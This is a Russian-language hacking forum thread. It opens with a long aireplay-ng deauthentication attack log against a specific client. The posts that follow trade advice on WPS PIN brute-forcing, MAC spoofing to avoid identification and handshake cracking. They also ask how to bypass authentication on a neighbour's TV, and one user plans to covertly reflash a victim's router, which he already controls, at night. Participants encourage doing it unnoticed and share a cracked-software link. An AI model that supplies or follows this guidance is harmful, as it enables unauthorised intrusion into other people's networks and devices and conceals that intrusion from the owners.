20:53:21 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
20:53:33 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 2 ACKs]
20:53:38 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
20:53:53 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 2 ACKs]
20:53:59 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
20:54:02 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
20:54:15 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 3 ACKs]
20:54:20 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
20:54:28 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 3 ACKs]
20:54:33 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
20:54:43 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
20:54:51 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
20:55:00 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 4 ACKs]
20:55:13 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
20:55:21 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 1| 3 ACKs]
20:55:22 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
20:55:38 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
20:55:45 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
20:55:53 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 3 ACKs]
20:56:02 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 4 ACKs]
20:56:09 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 2 ACKs]
20:56:18 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 4 ACKs]
20:56:24 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 4 ACKs]
20:56:33 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 2 ACKs]
20:56:38 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
20:56:46 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 1| 3 ACKs]
20:56:56 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 4 ACKs]
20:57:01 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 4 ACKs]
20:57:10 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 6 ACKs]
20:57:21 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
20:57:35 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
20:57:46 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
20:57:46 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
20:58:02 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 3 ACKs]
20:58:11 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 3| 8 ACKs]
20:58:13 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 3 ACKs]
^C
root@neo:~# aireplay-ng -0 100 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 wlan1mon
20:58:40 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
20:58:40 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
20:58:40 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
20:58:46 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 2 ACKs]
20:59:00 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
20:59:01 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
20:59:12 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
20:59:17 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
20:59:28 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
20:59:43 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 5 ACKs]
20:59:45 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
20:59:53 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 3 ACKs]
20:59:58 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:00:06 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:00:19 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 2 ACKs]
21:00:29 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 4 ACKs]
21:00:30 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:00:39 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:00:51 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
21:00:54 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
^C
root@neo:~# aireplay-ng -0 20 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 wlan1mon
21:01:16 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
21:01:16 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:01:17 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:01:31 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 3 ACKs]
21:01:33 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
21:01:46 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
21:01:57 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 3 ACKs]
21:02:06 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 2 ACKs]
21:02:09 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:02:26 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 3 ACKs]
21:02:33 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 5 ACKs]
21:02:43 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 3 ACKs]
21:02:52 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 3 ACKs]
21:02:59 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 4 ACKs]
21:03:02 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 3 ACKs]
21:03:09 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:03:21 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
21:03:25 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:03:36 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
21:03:43 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
21:03:54 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 1| 2 ACKs]
root@neo:~# aireplay-ng -0 20 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 wlan1mon
21:05:40 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
21:05:40 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:05:41 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:05:41 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:05:42 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:05:43 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
21:05:53 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 1| 1 ACKs]
21:06:03 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 5 ACKs]
21:06:11 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 3 ACKs]
^C
root@neo:~# aireplay-ng -0 20 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 -c 6 wlan1mon
Invalid destination MAC address.
"aireplay-ng --help" for help.
root@neo:~# aireplay-ng -0 20 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 -c6 wlan1mon
Invalid destination MAC address.
"aireplay-ng --help" for help.
root@neo:~# aireplay-ng -0 20 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 wlan1mon
21:06:46 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
21:06:47 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:06:47 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:06:48 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:06:48 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:06:54 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 4 ACKs]
21:07:03 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 7 ACKs]
21:07:04 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:07:16 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 2 ACKs]
21:07:19 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
21:07:30 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 3 ACKs]
21:07:38 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 4 ACKs]
21:07:47 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 2 ACKs]
Просмотрев все строки есть вывод, что атака на клиента имеет [ 2| 3 ACKs] и airodump-ng c теми параметрами в ~50db не соответствуют действительности, особенно , когда сила сигнала -9, и даже от самой точки -39 db. Поставьте acrylic wifi / посмотрите сигнала в windows, у Вас не правдивая информация в linux? какой?
fury_makers
10.11.2015, 09:13
Кто ставил cyborg hawk OS, есть ли там какие нибудь интересные инструменты для работы с беспроводными сетями?
=суMAшеDший=
12.11.2015, 19:08
1. Как сохранить сессию в goyscript при переборе пинов точки с WPS если wifislax грузится с флешки.
2. Как поменять MAC адрес в goyscript. Почему-то он всегда использует реальный.
Заранее спасибо.
Triton_Mgn
12.11.2015, 20:04
1. Как сохранить сессию в goyscript при переборе пинов точки с WPS если wifislax грузится с флешки.
2. Как поменять MAC адрес в goyscript. Почему-то он всегда использует реальный.
Заранее спасибо.
Смотрите в теме wifislax 10.1 там я описывал как сделать флешку чтобы сохранялись все изменения.
для смены mac адреса используйте chamac , в меню hardware tools вроде, но только после включения режима монитора.
1. Как сохранить сессию в goyscript при переборе пинов точки с WPS если wifislax грузится с флешки.
2. Как поменять MAC адрес в goyscript. Почему-то он всегда использует реальный.
Заранее спасибо.
1. Ctrl+C (как в reaver). Только результат пишется в /opt/goyscript/wps/sesiones/
Копиру эту папку куда-то себе. После перезагрузки обратно копируй. И так туда - сюда. Пока не получишь результат.
2. Никак. Можно до запуска goyscript использовать Chamac. WiFiSlax->HardwareTools->Chamac
А лучше сделай флешку с возможностью сохранять изменения как рекомендует Triton_Mgn. Будет намного проше и приятнее работать!
Triton_Mgn
12.11.2015, 20:50
Меню "Пуск"\wifislax\wpa wps\GOYsession (модуль .xzm создастся на рабочем столе, кинь его в папку base, или просто сохрани его где-нибудь и активируй при следующей загрузке ОСи после запуска гойскрипта).
То-же самое вроде делает и save reaver sessions, хотя могу и ошибаться.
http://[img]http://savepic.su/6456281.pnghttp://savepic.su/6456281.png
Ты ошибаешься сначала на флешке нужно создать раздел changes, а потом загружаться с нее в меню например kde+изменения.
Triton_Mgn
12.11.2015, 21:18
Сейчас проверил как правильно пользоваться chamac, что я и ожидал.
1 Если воспользоваться chamac до включения goyscript (режима монитора), поменяется адрес на wlanx, далее после включения монитора он возьмет адрес с железа, а толку от такой смены адреса =0.
2 Сделал так, включил goyscript (режим монитора) ,просканировал сети, остановил сканирование и до!!! выбора сети воспользовался chamac -вуаля на интерфейсе monx изменился mac адрес, ну а дальше обычная работа на подмененном mac.
Адреса можно смотреть командой ifconfig из терминала,
Triton_Mgn
12.11.2015, 22:25
Ты ошибаешься сначала на флешке нужно создать раздел changes, а потом загружаться с нее в меню например kde+изменения.
Приношу извинения, да действительно есть тузла сохранять только сессии goyscript, через модуль xzm ... Но как по мне можно потратить еще 5 минут для допиливания флешки, и все будет сохранятся (в том числе и музака- от скуки), в автоматическом режиме, причем в любой момент, незанятое пространство на флешке (в зависимости от раздела changes) , может вполне использоваться по предназначению внешнего накопителя из любой системы которая понимает fat32.
Triton_Mgn
12.11.2015, 22:46
Насчёт конкретно Atheros не могу с уверенностью сказать. Но эта модель не поддаётся.
На практике не встречал чипа Atheros и Broadcom которые поддались бы на Pixiedust, поэтому в блокноте растет их количество. Роутеры в моем регионе Eltex -broadcom, кто-то называет Tp-link- туполинками, а они на азеросе....В общем 2 чипа не убиваемые.... Есть же и доугие способы).
поделитесь, как разгонять карточки nvidia/ati под slax/kali linux. Рецепты из интернета относятся к старым дровам, а как бы под линуксами гонять GPU мало кто берется.
Triton_Mgn
12.11.2015, 23:03
Наверно сеть выходит через общий прокси сервер, поэтому другого интернета помимо HTTP нет.
Это не решается одним ответом, нужно исследовать сеть.
Просто предположение, может быть это точка с Yota, которая запрещает качать торренты, можно диапазон ip/
=суMAшеDший=
13.11.2015, 02:01
2 Сделал так, включил goyscript (режим монитора) , просканировал сети, остановил сканирование и до!!! выбора сети воспользовался chamac -вуаля на интерфейсе monx изменился mac адрес, ну а дальше обычная работа на подмененном mac.
Ничего страшного в том что далее при работе Goyscript'a выводится реальный MAC, но в ifconfig отображаются измененные?
Fanavana
13.11.2015, 04:17
Меняй мак на интерфейсе wlanX, а не на monX. до ЗАПУСКА!!! goyscript
Triton_Mgn
13.11.2015, 05:45
Dgjk
Ничего страшного в том что далее при работе Goyscript'a выводится реальный MAC, но в ifconfig отображаются измененные?
Вам говорили о chmac, далее сами додумывайте . Всякий чемодан обвиняет чуть ли не половину форума в прелюбодействии В ifconfig есть вся информация
Triton_Mgn
13.11.2015, 06:17
Ничего страшного в том что далее при работе Goyscript'a выводится реальный MAC, но в ifconfig отображаются измененные?
Странно - что тема ----- да ifconfig описывает все интерфейсы в реальном времени. Чувак эээ
На практике не встречал чипа Atheros и Broadcom которые поддались бы на Pixiedust, поэтому в блокноте растет их количество. Роутеры в моем регионе Eltex -broadcom, кто-то называет Tp-link- туполинками, а они на азеросе....В общем 2 чипа не убиваемые.... Есть же и доугие способы).
та способы то есть,ну эти самые туполинки как раз и нужны(потому что они тупо везде,во всём эфире)),а они не поддаются Pixiedust,от ривера лочатся или надолго или до перезагруза,что остаётся.....шейк ловить и монотонно перебирать.....не,это не способ(если пасс кракозяблистый),так какие ещё способы.....
Можно дать ссылку где описано как работа с программой "Passcape Wireless Password".?
Triton_Mgn
16.11.2015, 19:17
Можно дать ссылку где описано как работать с программой "Passcape Wireless Password".?
Зачетная аватара для такого вопроса)) http://www.passcape.com/wireless_password_recovery_rus вся документация здесь.
Triton_Mgn
16.11.2015, 20:30
Подскажите пожалуйста,как можно войти в телевизор,у которого включен блютуз,понятное дело,что телек у соседа,т.е мои гаджеты не сопряжённые с его телеком)))это пин код блютуза нужен?как такое вычисляется?
войти в телевизор где включен блутуз по wifi не удастся, не путайте интерфейсы...
войти в телевизор где включен блутуз по wifi не удастся, не путайте интерфейсы...
я и не говорил про wifi,у телека блютуз включен,нужно как то зайти в этот телек,понятное дело каким то образом минуя авторизацию.
У меня такой вопрос, если я владею 3 вайфай сетями с разными паролями, разными именами + могу зайти в настройки роутера каждого я могу как-то сделать чтоб была сеть без обрыва ?
"Бесшовный роуминг Wi-Fi"
UNIXTREID
18.11.2015, 11:55
У меня такой вопрос, если я владею 3 вайфай сетями с разными паролями, разными именами + могу зайти в настройки роутера каждого я могу как-то сделать чтоб была сеть без обрыва ?
На форуме как-то обсуждали подобную проблему, но там был вопрос про слияние мощности (пропускной способности) нескольких вай-фаев в один канал с получением в итоге суперскоростного интернета. Применительно к той теме в итоге оказалось, что такое невозможно.
Про бесшовный роуминг: если я правильно понял, то необходимо сделать так, чтобы при потере связи с одной точкой соединение тут же устанавливалось с другой точкой. Теоретически, конечно, это возможно (и на практике, как мне кажется, решается проще всего в Линуксе путём модернизации Wifi Manager'а различными скриптами). С другой стороны, пока компьютер установит соединение со следующей доступной точкой, всё равно уйдёт несколько секунд, поэтому трафик назвать "бесшовным" на 100% нельзя.
UNIXTREID
18.11.2015, 16:37
У меня такой вопрос: как сменить мак на антенне ubiquiti M2 ? В Интернете, в частности, на самом форуме Ubiquiti, конечно, есть решение (через файл rc.poststart), но у меня, в том-то и дело, что не сработало. Сделал по инструкции, в итоге изменился только мак WAN-интерфейса. А вот wlan интерфейс вообще исчез!!! Я даже по ssh зашёл, проверил. В итоге пришлось созданный poststart удалить и сбросить всё в заводские настройки. В чём ошибка? В интернете пишут, что у разных моделей этих антенн вроде по 2 интерфейса и нужно менять мак на каждом. Может, есть какие-то другие способы изменить беспроводной мак на этом устройстве?
ну кто что всё таки посоветует по моему вопросу?(
Подскажите,как можно подобрать пин код WPS на телевизоре?в эфире нашёл включеный wifi на телевизоре,wps включен,сигнал отличнейший,но пакетов вообще никаких не рассылает,т.е не ривер,ничего вообще не работает,так как пакеты не идут....
Что в таком случае можно сделать?)Просто реально первый раз такое вижу,что на телевизоре включен wps та и вообще wifi,обычно как то роутеры привычней
binarymaster
19.11.2015, 18:33
ну кто что всё таки посоветует по моему вопросу?(
Подскажите,как можно подобрать пин код WPS на телевизоре?
А никто не подскажет, потому что вы даже модель не назвали ни разу.
Впрочем, даже если вы её назовёте, вряд ли кто-то занимался исследованием таких устройств. Но гугл есть.
Есть рабочий бородатый WIFI-адаптер, Dlink DWL-120+ http://mcgrp.ru/manual/d-link/dwl-120 с WEP256 на борту.
Есть ли у кого прошивка этого динозавра, в WPA/WPA2?
(облазил уже все самые грязные закоулки в поиске)
А никто не подскажет, потому что вы даже модель не назвали ни разу.
Впрочем, даже если вы её назовёте, вряд ли кто-то занимался исследованием таких устройств. Но гугл есть.
Та нет проблем,называю модель
Телевизор Sony KDL-47W808A
Linksach
20.11.2015, 01:02
Ситуация такая есть хендшейк от сети но пароль найти проблема видимо сложный для поиска.Нужно вычислить внешний ip роутера возможно у него открыт доступ извне .Чем можно это сделать если нет подключения к его сети.Например можно както просканировать сети которые у меня в трее ноутбука на определение wan-адресса в кали линукс ?Наверное это невозможно.Ибо если бы было возможно то люди бы не заморачивались бы с хендшейками и переборами по словарю
binarymaster
20.11.2015, 15:16
Вопрос больше по анонимности, чем по беспроводным сетям:
http://s8.hostingkartinok.com/uploads/thumbs/2015/11/2c3207aca56847f5bcc6923c8365ce8f.png http://s8.hostingkartinok.com/uploads/thumbs/2015/11/a1df1555950c5d8d5419d35d18dfc214.png
Как поменять картинку на фоне в загрузчике, и на экране логина?
"the quieter you become, the more you are able to hear" - хороший девиз, но по картинке можно распознать дистрибутив, что сразу же выдаст тебя с какой-либо стороны.
erwerr2321
20.11.2015, 15:28
Вопрос больше по анонимности, чем по беспроводным сетям:
http://s8.hostingkartinok.com/uploads/thumbs/2015/11/2c3207aca56847f5bcc6923c8365ce8f.png http://s8.hostingkartinok.com/uploads/thumbs/2015/11/a1df1555950c5d8d5419d35d18dfc214.png
Как поменять картинку на фоне в загрузчике, и на экране логина?
"the quieter you become, the more you are able to hear" - хороший девиз, но по картинке можно распознать дистрибутив, что сразу же выдаст тебя с какой-либо стороны.
О, ну почти всё так...
http://hackaholic.info/change-kali-linux-login-wallpaper/
Как можно делать перебор паролей не видео картой а ОЗУ ?
binarymaster
20.11.2015, 20:21
Как можно делать перебор паролей не видео картой а ОЗУ ?
ОЗУ - это не вычислительный инструмент.
Ситуация такая есть хендшейк от сети но пароль найти проблема видимо сложный для поиска.Нужно вычислить внешний ip роутера возможно у него открыт доступ извне .Чем можно это сделать если нет подключения к его сети.Например можно както просканировать сети которые у меня в трее ноутбука на определение wan-адресса в кали линукс ?Наверное это невозможно.Ибо если бы было возможно то люди бы не заморачивались бы с хендшейками и переборами по словарю
та да,супер было бы,сам такие вопросы задавал)),вычислить внешний ip,но видимо только RS,но геморно,не знаешь ведь,что за провайдер на точке,тогда хоть диапазон просканить можно было бы.Ну и опять таки......хорошо,если включено управление из вне.....а так....фонарь
erwerr2321
21.11.2015, 00:17
хорошо,если включено управление из вне.....а так....фонарь
ЕСЛИ ТАК РАССУЖДАТЬ, ТОГДА К ЧЕМУ ИСКАТЬ ТЕ САМЫЕ IP....
А вообще можно ещё года 2 спрашивать одно и тоже, и ничего не пробовать - "идеальный вариант"!
Linksach
22.11.2015, 02:56
Друзья подскажите пожалуйста как в этом роутере открыть доступ извне чтоб он был виден в RS и в браузере. Человек стал часто менять пароль видимо скоро уже и WPS отключит так что единственная надежда это сделать видимым этот роутер в инете.Вот он:
http://rghost.ru/7w7ZDGYTQ
в туполинках понятно-поставил 255.255.255.255 и открыл доступ а здесь неясно.
Заранее благодарю!Если можно объясните что и куда прописать
Дайте плиз ссылку на CommView.for.WiFi.7,1 с ключем.
binarymaster
22.11.2015, 15:56
Друзья подскажите пожалуйста как в этом роутере открыть доступ извне чтоб он был виден в RS и в браузере.
На вашем же скриншоте - поставить ВКЛ и нажать Применить. Остальные настройки уже трогать не надо.
Если извне открываться не будет, попробуйте сменить порт на 1080.
Дайте плиз ссылку на CommView.for.WiFi.7,1 с ключем.
http://rghost.net/private/8GBVHG4ys/6d05c1e426670c7d2620a1fb29105909
fire-dance
23.11.2015, 00:39
Как можно делать перебор паролей не видео картой а ОЗУ ?
Elcomsoft Wireless Security Auditor она может переключиться с видео на озу но перебор будет слаб у меня допустим проц i7 4 ядерный пербор 7 тыс в сек
greenner
23.11.2015, 01:28
Подскажите пожалуйста как из pcap файла сделать cap,некоторые сайты расшифровки пароля просят только cap.Спасибо
henri2002
23.11.2015, 02:09
Подскажите пожалуйста как из pcap файла сделать cap,некоторые сайты расшифровки пароля просят только cap.Спасибо
Wireshark
erwerr2321
23.11.2015, 02:17
Подскажите пожалуйста как из pcap файла сделать cap,некоторые сайты расшифровки пароля просят только cap.Спасибо
а переименовать не пробовали?
вернее просто изменить расширение с file.pcap на file.cap?
Triton_Mgn
23.11.2015, 03:14
Elcomsoft Wireless Security Auditor она может переключиться с видео на озу но перебор будет слаб у меня допустим проц i7 4 ядерный пербор 7 тыс в сек
Вот и оперируйте своим процессором, ом ном ном. озу, !!!как Вам донести , что самая вычислительная нагрузка ложится на видеокарту.
Linksach
23.11.2015, 09:30
На вашем же скриншоте - поставить ВКЛ и нажать Применить. Остальные настройки уже трогать не надо.
Если извне открываться не будет, попробуйте сменить порт на 1080.
Коректно работает только с портом 80 т.е по внешнему ip открывается в браузере страница админки,а с портами 1080 и 8080 не открывается.Роутер Скан же находит роутер с портами 80 и 1080,порт 8080 в RS не катит для данного роутера.Поэтому остановился на порте 80
Linksach
23.11.2015, 11:31
А в этом наверное вряд ли получится сделать доступ извне здесь отсутствует пункт -Удалённое управление .Видать прошили так с целью чтоб никто не мог влезть в роутер.А можно ли удалённо со своего ноутбука сменить прошивку на чужом роутере чтоб появился этот пункт удалённого управления
http://rghost.ru/7bX8R4YKl
Triton_Mgn
23.11.2015, 14:48
Ему в принципе можно поменять прошивку, раз доступ есть.. но!!! с сохраненными настройками - это я, к тому, что можно незаметно.....
А в этом наверное вряд ли получится сделать доступ извне здесь отсутствует пункт -Удалённое управление .Видать прошили так с целью чтоб никто не мог влезть в роутер.А можно ли удалённо со своего ноутбука сменить прошивку на чужом роутере чтоб появился этот пункт удалённого управления
http://rghost.ru/7bX8R4YKl
Жёстко было бы,прошивать по воздуху,тогда и взламывать не надо,по воздуху на завод сбросил и всё,открытая точка
Ему в принципе можно поменять прошивку, раз доступ есть.. но!!! с сохраненными настройками - это я, к тому, что можно незаметно.....
так доступ есть,но прошивают через кабель же
Скажите,а что можно сделать,если устройство(роутер,телек и тд)с wifi не отсылает вообще никаких пакетов,хотя сигнал просто отличнейший?Ну например:wps включен,включаешь ривер или булли,и ничего не происходит,т.е пишет:ожидание beacon,вот так можно часами сидеть ожидать и ничего,beacon не идут,хотя говорю ж,сигнал отличный.Вот что в таком случае нужно делать?
так доступ есть,но прошивают через кабель же
По воздуху можно (туполинк например), главное доступ
Triton_Mgn
23.11.2015, 15:21
Скажите,а что можно сделать,если устройство(роутер,телек и тд)с wifi не отсылает вообще никаких пакетов,хотя сигнал просто отличнейший?Ну например:wps включен,включаешь ривер или булли,и ничего не происходит,т.е пишет:ожидание beacon,вот так можно часами сидеть ожидать и ничего,beacon не идут,хотя говорю ж,сигнал отличный.Вот что в таком случае нужно делать?
О2 здесь причем?. Если есть полный доступ к устройству..... Серж - ты действительно 2 года сидишь и ...... - работаешь на спец службы? Иначе тебя не назовешь...
erwerr2321
23.11.2015, 15:21
Скажите,а что можно сделать,если устройство(роутер,телек и тд)с wifi не отсылает вообще никаких пакетов,хотя сигнал просто отличнейший?Ну например:wps включен,включаешь ривер или булли,и ничего не происходит,т.е пишет:ожидание beacon,вот так можно часами сидеть ожидать и ничего,beacon не идут,хотя говорю ж,сигнал отличный.Вот что в таком случае нужно делать?
Продолжайте наблюдение!
По воздуху можно (туполинк например), главное доступ
странно,не знал,обычно вообще всё через кабель прошивают(не только роутеры)Ну тогда да,супер.если так можно..
Продолжайте наблюдение!
ну а серьёзно?что ж наблюдать
Triton_Mgn
23.11.2015, 15:32
Чемодан (думаю все поймут) у нас ребята. завелась крыса, это не обвинение...
Triton_Mgn
23.11.2015, 15:47
Та тышьуспокойся тебя вычичлили
Triton_Mgn
23.11.2015, 16:06
Господа модераторы это факт , ладно при му за неразлашение, Он просто надоел, есть хоть болеее компетентный сотредник.
Linksach
23.11.2015, 20:30
Ему в принципе можно поменять прошивку, раз доступ есть.. но!!! с сохраненными настройками - это я, к тому, что можно незаметно.....
Незаметно это только получится ночью.Конечно с сохранёнными настройками .Доступ есть да полный к роутеру ,человек пользуется шифр Wep я думаю не сильно заморачивается своим инетом.Я там уже в его роутере полкоманды клиентов занёс в чёрНЫый список МАС-адрессов а он хоть бы что никакой реакции на происходящее.Так что думаю ночью можно будет поменять его прошивку на свою тоже на русском языке.Сначала хочу потренироваться на каком то роутере из туполинка выловленного RS -ом а потом уже и на нужном провернуть эту операцию Ы,ПОТОМУ ЧТО пока этим не занимался может быть нужна будет ещё ваша помощь!
Triton_Mgn
23.11.2015, 21:09
Незаметно это только получится ночью.Конечно с сохранёнными настройками .Доступ есть да полный к роутеру ,человек пользуется шифр Wep я думаю не сильно заморачивается своим инетом.Я там уже в его роутере полкоманды клиентов занёс в чёрНЫый список МАС-адрессов а он хоть бы что никакой реакции на происходящее.Так что думаю ночью можно будет поменять его прошивку на свою тоже на русском языке.Сначала хочу потренироваться на каком то роутере из туполинка выловленного RS -ом а потом уже и на нужном провернуть эту операцию Ы,ПОТОМУ ЧТО пока этим не занимался может быть нужна будет ещё ваша помощь!
